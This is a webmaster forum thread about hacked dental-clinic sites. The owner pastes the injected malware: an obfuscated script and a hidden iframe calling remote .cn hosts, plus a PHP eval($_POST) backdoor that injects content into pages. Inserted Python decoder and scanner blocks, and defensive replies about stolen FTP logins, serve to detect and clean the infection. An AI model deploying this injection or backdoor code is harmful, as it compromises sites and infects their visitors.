Another Site Hacked !!!


mann.in hacked; earlier, some time back, voodooindia.com was hacked.

See the code content of Index.html and index.php; even subdomain files are injected with suspicious JavaScript code and an iframe.

I'm removing all files and restoring the copies I have.

What can be done to prevent this? Is this a security lapse in the server? This is the second site on the same server with similar code and blocked by Google.

Code:
<html>
<head>
<title>Welcome to Dr. Mann Website, please stand by, while we redirect....</title>
<meta http-equiv="refresh" content="5; URL=http://dentalimplantendodontic.mann.in/">

</head><script type="text/javascript">var hPLAmyvsdfELzjhpwQYf = "EOje60EOje105EOje102EOje114EOje97EOje109EOje101EOje32EOje119EOje105EOje100EOje116EOje104EOje61EOje34EOje52EOje56EOje48EOje34EOje32EOje104EOje101EOje105EOje103EOje104EOje116EOje61EOje34EOje54EOje48EOje34EOje32EOje115EOje114EOje99EOje61EOje34EOje104EOje116EOje116EOje112EOje58EOje47EOje47EOje116EOje114EOje97EOje102EOje102EOje105EOje99EOje45EOje114EOje101EOje115EOje111EOje117EOje114EOje99EOje101EOje115EOje46EOje99EOje110EOje47EOje111EOje114EOje100EOje101EOje114EOje47EOje105EOje110EOje46EOje99EOje103EOje105EOje63EOje50EOje34EOje32EOje115EOje116EOje121EOje108EOje101EOje61EOje34EOje98EOje111EOje114EOje100EOje101EOje114EOje58EOje48EOje112EOje120EOje59EOje32EOje112EOje111EOje115EOje105EOje116EOje105EOje111EOje110EOje58EOje114EOje101EOje108EOje97EOje116EOje105EOje118EOje101EOje59EOje32EOje116EOje111EOje112EOje58EOje48EOje112EOje120EOje59EOje32EOje108EOje101EOje102EOje116EOje58EOje45EOje53EOje48EOje48EOje112EOje120EOje59EOje32EOje111EOje112EOje97EOje99EOje105EOje116EOje121EOje58EOje48EOje59EOje32EOje102EOje105EOje108EOje116EOje101EOje114EOje58EOje112EOje114EOje111EOje103EOje105EOje100EOje58EOje68EOje88EOje73EOje109EOje97EOje103EOje101EOje84EOje114EOje97EOje110EOje115EOje102EOje111EOje114EOje109EOje46EOje77EOje105EOje99EOje114EOje111EOje115EOje111EOje102EOje116EOje46EOje65EOje108EOje112EOje104EOje97EOje40EOje111EOje112EOje97EOje99EOje105EOje116EOje121EOje61EOje48EOje41EOje59EOje32EOje45EOje109EOje111EOje122EOje45EOje111EOje112EOje97EOje99EOje105EOje116EOje121EOje58EOje48EOje34EOje62EOje60EOje47EOje105EOje102EOje114EOje97EOje109EOje101EOje62";var wyAIvMIOvBsdRDeECZxg = hPLAmyvsdfELzjhpwQYf.split("EOje");var EBrElZthpSMlQNtLZBZV = "";for (var DRzVVdaXDXEHYwLKVFrL=1; DRzVVdaXDXEHYwLKVFrL<wyAIvMIOvBsdRDeECZxg.length; DRzVVdaXDXEHYwLKVFrL++){EBrElZthpSMlQNtLZBZV+=String.fromCharCode(wyAIvMIOvBsdRDeECZxg[DRzVVdaXDXEHYwLKVFrL]);}var FmdulWQzUMVHZPWHWyXp = 
""+EBrElZthpSMlQNtLZBZV+"";document.write(""+FmdulWQzUMVHZPWHWyXp+"")</script>
<body><iframe src="http://combinebet.cn:8080/index.php" width=166 height=117 style="visibility: hidden"></iframe>
<center>
<br><br><br><br>
<font size="1" face="Verdana">Welcome to<br><b><br>
<br>

</b>

</font>
<b>
<font size="5" face="Verdana">Mann.IN</font></b><font size="1" face="Verdana"><br>
<br><br><br>
<a href="http://dentalimplantendodontic.mann.in/" style="text-decoration: none">Click Here if your browser doesn't 
automatically redirect you within 5 seconds.</a>
<br><br><br><br><br>
<div align="center">Visit Dr. Mann's Dental Implant & Endodontic Centre for International quality treatment aided by DENTSPLY. Dentsply - For HiTech Dentistry</div><br><br>
<a href="http://dentalimplantendodontic.mann.in/" style="text-decoration: none" title="Visit Dr. Mann's Dental Implant & Endodontic Centre for International quality treatment aided by DENTSPLY. Dentsply - For Better Dentistry"><img src="/images/dentsply-logo.jpg" width="200" height="59" border="0" alt="Visit Dr. Mann's Dental Implant & Endodontic Centre for International quality treatment aided by DENTSPLY. Dentsply - For Better Dentistry" title="Visit Dr. Mann's Dental Implant & Endodontic Centre for International quality treatment aided by DENTSPLY. Dentsply - For Better Dentistry" /></a>
<br><br><br><br><br>

<a href="http://dentsply.com" target="_blank">dentsply.com</a> | <a href="http://dentsply-friadent.com" target="_blank">dentsply-friadent.com</a> | <a href="http://maillefer.ch" target="_blank">maillefer.ch</a> | <a href="http://dentsply.co.uk" target="_blank">dentsply.co.uk</a> | <a href="http://caulk.com" target="_blank">caulk.com</a> | <a href="http://dentsply.de" target="_blank">dentsply.de</a>
<br><br><br>
Copyright © 2008, 
<a href="http://dentalimplantendodontic.mann.in/" style="text-decoration: none">Mann Dental Implant Endodontic Centre</a>
<br><font color="#C0C0C0">Site & Hosting: </font> 

<a href="http://www.fastrackcomputing

Now see the content of the Index.PHP page at the very beginning and at the end; I don't know where this code came from. The site mann.in is marked as a hacked site by Google.



Code:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('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'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script><>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \n\(function\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title><iframe src="http://combinebet.cn:8080/index.php" width=166 height=117 style="visibility: hidden"></iframe>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<title>Dental Implant and Cosmetic Clinic</title>

<link href="includes/style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0" class="maintable">
  <tr><td align="center">
<div class="main">
<?php include("includes/menu.php"); ?>

  <table class="content" width="699" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td align="left" valign="top" style="width:256px; padding-top:1px;">
      <div align="left" style="border:1px solid #666666; padding:2px; width:250px">Visit Dr. Mann's  Dental Implant & Endodontic Centre for International quality  treatment aided by DENTSPLY. Dentsply - For HiTech Dentistry
<br />
<div align="center"><a href="http://dentalimplantendodontic.mann.in/" title="Visit Dr. Mann's Dental Implant & Endodontic Centre for International quality treatment aided by DENTSPLY. Dentsply - For Better Dentistry"><img src="http://mann.in/images/dentsply-logo.jpg" alt="Visit Dr. Mann's Dental Implant & Endodontic Centre for International quality treatment aided by DENTSPLY. Dentsply - For Better Dentistry" title="Visit Dr. Mann's Dental Implant & Endodontic Centre for International quality treatment aided by DENTSPLY. Dentsply - For Better Dentistry" width="200" border="0" height="59" /></a> <br />
<a href="http://dentsply.com" target="_blank">dentsply.com</a> | <a href="http://dentsply-friadent.com" target="_blank">dentsply-friadent.com</a> | <a href="http://maillefer.ch" target="_blank">maillefer.ch</a> | <a href="http://dentsply.co.uk" target="_blank">dentsply.co.uk</a> | <a href="http://caulk.com" target="_blank">caulk.com</a> | <a href="http://dentsply.de" target="_blank">dentsply.de</a></div>
</div><br />
	  <img src="http://www.namepros.com/images/newsandevents.jpg" width="128" height="13" />
	  <p><span class="newstitle">Mann Dental Implant Endodontic Centre ! - 13/11/2008</span></p>
	  <img src="http://www.namepros.com/images/blogimg.jpg" width="201" height="64" /><br />
	  Dental Implant Endodontic Centre along with Online Dental Resource Centre with the aim of providing specialist treatment and online consultation has been launched in November 2008. 
	  <div style="padding:20px 0px 20px 0px;">
	  <table width="95%" border="0" cellspacing="2" cellpadding="2">
        <tr>
          <td><a href="infants_children.php"><img src="http://www.namepros.com/images/btn_infant.gif" border="0" /></a></td>

      <td><a href="teens.php"><img src="http://www.namepros.com/images/btn_teens.gif" border="0" /></a></td>

    </tr>

        <tr>

          <td><a href="adults.php"><img src="http://www.namepros.com/images/btn_adult.gif" border="0" /></a></td>

      <td><a href="fiftyplus.php"><img src="http://www.namepros.com/images/btn_plus.gif" border="0" /></a></td>

    </tr>

      </table>

	  </div>
<? include("includes/newsletter.php"); ?>
	  </td>

      <td align="left" valign="top" style="width:442px;">

	    <table width="99%" border="0" cellspacing="0" cellpadding="0" style="width:99%;">

        <tr>

          <td style="background-color:#015232; height:156px; width:15px;"> </td>

          <td align="left" valign="top" style="background-color:#015232; height:156px; width:412px;">

		  <div style="float:left; padding:10px 2px 5px 0px;"><img src="http://www.namepros.com/images/welcome.jpg" width="145" height="128" /></div>

		  <div style="padding:10px 0px 5px 0px; color:#FFFFFF">

		  <img src="http://www.namepros.com/images/welcome_to.jpg" width="244" height="36" /><br />

		  We provide specialist treatments in Dental Implants, Root Canal Treatment (RCT), Cosmetic Smile Designing, Crown and Bridge Fixed Prosthesis, Removable Partial and Full Dentures, Laser Tooth Whitening, Light Cured and Self-Cured Composite Fillings, Extractions and

		  <div style="float:right; padding-top:1px;"><a href="about.php" style="color:#FFFFFF">Read More>></a></div>

		  ...</div>		  </td>

          <td style="background-color:#015232; height:156px; width:15px;"> </td>

        </tr>

      </table>

	    <table width="100%" border="0" cellspacing="0" cellpadding="0">

          <tr>

            <td rowspan="3" align="left" valign="top" style="padding:5px;">

			<img src="http://www.namepros.com/images/our_services.jpg" width="96" height="13" />

			  <ul>

			    <li>Dental Implants</li>

                <li> Root Canal Treatment</li>

                <li> Cosmetic Smile Designing</li>

                <li> Crown and Bridge Fixed Prosthesis</li>

                <li> Removable Partial and Full Dentures</li>

                <li> Laser Tooth Whitening</li>

                <li> Light Cured & Self Cured Composite Fillings</li>

                <li> Extractions</li>

                <li> Minor Surgeries </li>

              </ul></td>

            <td align="left" valign="top"></td>

          </tr>

          <tr>

            <td align="center" valign="top" style="padding-top:5px;"><a href="gallery.php"><img src="http://www.namepros.com/images/gallery.jpg" alt="Gallery" width="201" height="64" border="0" /></a></td>

          </tr>

          <tr>

            <td align="left" valign="top" style="padding:5px; vertical-align:top;">

			  <p><span style="padding:5px;">
              <img src="http://www.namepros.com/images/dental_blo.jpg" width="86" height="16" /></span>			</p>

			         

			    <?
		include "vinod.php";	
		// Create RSS object
		$rss = new lastRSS;
		$rss->cache_dir = 'temp';
		$rss->cache_time = 10;
		$rss->cp = 'US-ASCII';
                $rss->items_limit = 5;
		$rss->date_format = 'l';
		//passing the rss URL
		if ($rs = 
$rss->get("http://mann.in/blog/?feed=rss2")) {
			//going through each item
			foreach($rs['items'] as $item)
			{
				//title
				echo("<a style='text-decoration: none;color:#000000' href='".$item['link']."' 
target='_blank'>".$item['title']."</a>");
				//description
				//echo("<font size='1' color='gray'>".$item['description']."</font>");
				echo("<br>");
			}
		}
		//adding the copyright statement
		$news .= "<small><i>".$rs['copyright']."</i></small>";
	
echo "";
?>	

			    </td>

          </tr>

        </table>	    

	    </td>

    </tr>

    <tr>

      <td colspan="2" align="left" valign="top">

	 <?php echo ''; ?><?php echo '<script type="text/javascript">var hPLAmyvsdfELzjhpwQYf = "EOje60EOje105EOje102EOje114EOje97EOje109EOje101EOje32EOje119EOje105EOje100EOje116EOje104EOje61EOje34EOje52EOje56EOje48EOje34EOje32EOje104EOje101EOje105EOje103EOje104EOje116EOje61EOje34EOje54EOje48EOje34EOje32EOje115EOje114EOje99EOje61EOje34EOje104EOje116EOje116EOje112EOje58EOje47EOje47EOje116EOje114EOje97EOje102EOje102EOje105EOje99EOje45EOje114EOje101EOje115EOje111EOje117EOje114EOje99EOje101EOje115EOje46EOje99EOje110EOje47EOje111EOje114EOje100EOje101EOje114EOje47EOje105EOje110EOje46EOje99EOje103EOje105EOje63EOje50EOje34EOje32EOje115EOje116EOje121EOje108EOje101EOje61EOje34EOje98EOje111EOje114EOje100EOje101EOje114EOje58EOje48EOje112EOje120EOje59EOje32EOje112EOje111EOje115EOje105EOje116EOje105EOje111EOje110EOje58EOje114EOje101EOje108EOje97EOje116EOje105EOje118EOje101EOje59EOje32EOje116EOje111EOje112EOje58EOje48EOje112EOje120EOje59EOje32EOje108EOje101EOje102EOje116EOje58EOje45EOje53EOje48EOje48EOje112EOje120EOje59EOje32EOje111EOje112EOje97EOje99EOje105EOje116EOje121EOje58EOje48EOje59EOje32EOje102EOje105EOje108EOje116EOje101EOje114EOje58EOje112EOje114EOje111EOje103EOje105EOje100EOje58EOje68EOje88EOje73EOje109EOje97EOje103EOje101EOje84EOje114EOje97EOje110EOje115EOje102EOje111EOje114EOje109EOje46EOje77EOje105EOje99EOje114EOje111EOje115EOje111EOje102EOje116EOje46EOje65EOje108EOje112EOje104EOje97EOje40EOje111EOje112EOje97EOje99EOje105EOje116EOje121EOje61EOje48EOje41EOje59EOje32EOje45EOje109EOje111EOje122EOje45EOje111EO
 
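The injected script at the top of the page above hides its iframe as a run of decimal character codes joined by the separator "EOje", which the browser splits apart and reassembles with String.fromCharCode before document.write() (decoded, it is an opacity:0, off-screen iframe loading a page from a remote .cn host). The decoder below is an added example, not code from the thread; it reads the separator from the .split() call rather than assuming "EOje", runs on a constructed sample that reuses the page's variable names but points at the placeholder host attacker.invalid, and then flags any iframe the decoded markup styles invisible.

```python
import re

# Matches the two statements the injected script relies on:
#   var NAME = "<sep><code><sep><code>...";   and   NAME.split("<sep>")
_PAYLOAD_RE = re.compile(r'var\s+(\w+)\s*=\s*"([^"]+)"\s*;')
_SPLIT_RE = re.compile(r'(\w+)\.split\("([^"]+)"\)')


def decode_charcode_script(script_text):
    """Return the string the script would document.write(), or None if the
    pattern is absent. The separator comes from the .split() call, so this
    also handles variants that use something other than "EOje"."""
    split_match = _SPLIT_RE.search(script_text)
    if not split_match:
        return None
    var_name, separator = split_match.groups()
    for name, payload in _PAYLOAD_RE.findall(script_text):
        if name == var_name:
            # The payload begins with the separator, so element 0 is empty;
            # the injected loop skips it too by starting at index 1.
            parts = payload.split(separator)[1:]
            return "".join(chr(int(p)) for p in parts if p.isdigit())
    return None


def find_hidden_iframes(html):
    """Return the src of every <iframe> styled to be invisible or off-screen."""
    found = []
    for tag in re.findall(r"<iframe[^>]*>", html, flags=re.IGNORECASE):
        style = " ".join(re.findall(r'style="([^"]*)"', tag, flags=re.IGNORECASE))
        compact = style.lower().replace(" ", "")
        # Heuristic: opacity:0, visibility:hidden, or pushed off the left edge.
        hidden = any(k in compact for k in ("opacity:0", "visibility:hidden", "left:-"))
        src = re.search(r'src="([^"]*)"', tag, flags=re.IGNORECASE)
        if hidden and src:
            found.append(src.group(1))
    return found


def encode_charcode(text, separator):
    """Rebuild the obfuscation; used only to construct the sample below."""
    return "".join(separator + str(ord(c)) for c in text)


# Constructed sample: same scheme, separator and variable names as the hacked
# page, but the iframe points at a placeholder host rather than the real one.
SAMPLE_IFRAME = ('<iframe width="480" height="60" src="http://attacker.invalid/in.cgi?2" '
                 'style="opacity:0; position:relative; left:-500px"></iframe>')
SAMPLE_SCRIPT = (
    'var hPLAmyvsdfELzjhpwQYf = "' + encode_charcode(SAMPLE_IFRAME, "EOje") + '";'
    'var wyAIvMIOvBsdRDeECZxg = hPLAmyvsdfELzjhpwQYf.split("EOje");'
    'for (var i=1; i<wyAIvMIOvBsdRDeECZxg.length; i++){ /* fromCharCode loop */ }'
)

if __name__ == "__main__":
    decoded = decode_charcode_script(SAMPLE_SCRIPT)
    print(decoded)                       # the iframe, in clear text
    print(find_hidden_iframes(decoded))  # ['http://attacker.invalid/in.cgi?2']
```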
Are you using any CMS software for the sites, or are these coded by yourself? If it is a CMS, someone is smart enough to break in when you have not applied the required patches. I have seen similar attacks on popular CMS-based sites.
Do you have access to raw logs / site analytics? Analyze where the h*** are coming from and what the process is: how do they gain access to the site / pages / server...

For now, before you restore, I suggest first figuring out how to prevent it in future, and until then, keep a "site under maintenance" notice up for the moment.

If the server is not reliable - change them!!!
 
Hello,

No, there is no CMS; it's a static HTML page, and in the subdomain it's a PHP page, which is also static, just using the include function to manage the menus and header/footer.
 
What are the permissions on your files/directories? If this is a shared server, it could be some other account on the server compromising your files. Make sure they're not writeable by anyone but the file/directory owner.

Get the raw logs and try to determine where this is coming from. If there's nothing in the web logs, it's definitely someone else with access to the server.

I'd seriously recommend changing hosts!
 
I spent all day yesterday working on sites that were affected by this. Some of the iframe code above matches the same things I was finding on about 65 of my clients' sites.

It seems as though hackers have been collecting FTP account logins and then used a worm or virus to use the information to log into sites and look for any index.xxxx pages and add the code for iframes or other things. Then if people hit the infected page they are sent a couple of places and may wind up being infected with other things that add them to a botnet.

The sites that were infected were ones that the client's staff had FTP access to. None of my personal sites were affected, even though they share about 4-5 different hosting accounts. The pages were modified using valid FTP accounts.

Most of our sites DO NOT use a CMS or have any scripting that could have been used. I checked one site's FTP log and found there had been access from Romania...!

If you check your sites and see a blank spot at the top or bottom, or if the page starts taking a long time to load, then it may be infected. Best to use FTP and check your index files for "iframe" that you don't expect to see there. It may be just after the <body> tag, or at the end of the file. The virus is poorly written, so it often erases part of the end of the page, removing the /body and /html tags.

First thing to do is change your FTP passwords, then run a scan on your computer. I hear that the Malwarebytes free version can find this if your PC is infected, but run several different ones to make sure you're clean if you are having problems.
 
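The checks in the post above (an iframe sitting just after <body> or at the end of an index file, a page whose closing /body and /html tags were erased), together with the eval($_POST[...]) line at the top of the injected index.php shown earlier in the thread, can be turned into a quick triage scan of a web root. The Python below is an added example, not code from the thread; it builds its own constructed sample web root under a temp directory, using attacker.invalid as a placeholder host, and reports which index files match which indicators.

```python
import os
import re
import tempfile

INDEX_NAME = re.compile(r"^index\.(html?|php)$", re.IGNORECASE)
EDGE_WINDOW = 400  # chars after <body> or before EOF that count as "at the edge"

def scan_text(text):
    """Return the indicator names found in one file's contents, in fixed order."""
    hits = []
    lower = text.lower()
    body_pos = lower.find("<body")
    for m in re.finditer(r"<iframe\b", lower):
        near_body = body_pos != -1 and 0 <= m.start() - body_pos <= EDGE_WINDOW
        near_end = len(lower) - m.start() <= EDGE_WINDOW
        if near_body or near_end:
            hits.append("iframe_at_edge")  # where the FTP worm drops it
            break
    if re.search(r"<iframe[^>]*(visibility:\s*hidden|opacity:\s*0)", lower):
        hits.append("hidden_iframe")
    if body_pos != -1 and ("</body" not in lower or "</html" not in lower):
        hits.append("truncated_closing_tags")  # injector erased the file's tail
    if re.search(r"eval\s*\(\s*\$_(post|get|request)\b", lower):
        hits.append("php_eval_backdoor")  # eval($_POST[...]) at top of index.php
    if "fromcharcode" in lower and "document.write" in lower and ".split(" in lower:
        hits.append("obfuscated_script")  # split / fromCharCode / document.write trio
    return hits

def scan_webroot(root):
    """Walk root and return {relative path: [indicators]} for flagged index files."""
    flagged = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not INDEX_NAME.match(name):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="latin-1") as fh:
                hits = scan_text(fh.read())
            if hits:
                flagged[os.path.relpath(path, root)] = hits
    return flagged

def build_sample_webroot():
    """Write a constructed web root: one clean index file and two infected ones."""
    root = tempfile.mkdtemp(prefix="webroot_")
    samples = {
        "index.html": "<html><head><title>ok</title></head><body><p>hi</p></body></html>",
        "sub/index.html": '<html><body><iframe src="http://attacker.invalid/" '
                          'style="visibility: hidden"></iframe><p>site</p>',
        "sub/index.php": "<?php if(isset($_POST['tmp_x'])) eval($_POST['tmp_x']); ?>"
                         "<html><body><p>site</p></body></html>",
    }
    for rel, content in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="latin-1") as fh:
            fh.write(content)
    return root

if __name__ == "__main__":
    for rel, hits in scan_webroot(build_sample_webroot()).items():
        print(rel, hits)
```

Point scan_webroot at a copy of the real web root taken before the restore; a hit only says the file deserves a look, and a clean result does not rule out injection elsewhere.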
Another Indian hacker group. There's no end to them.

Good luck on getting things back to normal.
Sean
 
Agreed, if they are accessing FTP, you can bet that they have a keylogger on one or more computers. Make sure all of the affected clients scan their computers (or any that they use), as otherwise it will just happen again when they change passwords. I cannot underscore that enough. I've seen too many folks that don't understand that part.
 
Another Indian hacker group. There's no end to them.
First I've heard it involved anyone in India, not that it couldn't. But like I said, the system responsible for FTPing the files to one of our sites was located in Romania. One news source said it was from Ukraine.
 
That's news to me, being an Indian...
Are there Indian hacker groups that hack websites too :(
 
Nowadays you have many ways to get infected. Lots of unpatched known holes in the wild, for example Adobe PDF Reader, QuickTime, DirectX... All of these could be used to spread malware/viruses and gain access to whatever.
 
Nowadays you have many ways to get infected. Lots of unpatched known holes in the wild, for example Adobe PDF Reader, QuickTime, DirectX... All of these could be used to spread malware/viruses and gain access to whatever.


Totally agree. There are so many widely used free applications that we "trust"; imagine if a staff member at a company like Firefox installed an undetectable virus within their application. The consequences would be terrible, as most people use Firefox, especially within the web industry, where people access places others shouldn't.

I wonder how companies like Firefox keep their application and ensure that none of their staff are doing anything they shouldn't be; look at Microsoft, and the many little funny bits of code there are in Windows XP, put in by developers without others knowing until release.

Sean
 
Hello,

I've restored, and added the site in Google Webmasters and submitted it for review. (There it is also displaying a malware infection notice.)

In a day the site is back online.


---

Well, as per my knowledge, the client has not accessed FTP even a single time since the site went online, nor have I or any other guy logged in. I'm using NOD antivirus and I guess there is no keylogger.

This is the 5th site I'm seeing in my lifetime with this kind of problem, and NONE of them is my personal site. 2 were my clients'. 3 of them were someone else's.

-----

Directory / file permissions are the default 755 / 644.
 
The best idea is to contact your server provider or host provider.

If you're on a dedicated server then move to managed services such as WaveWeb; they helped me when I was hacked a few months ago.

Sean
 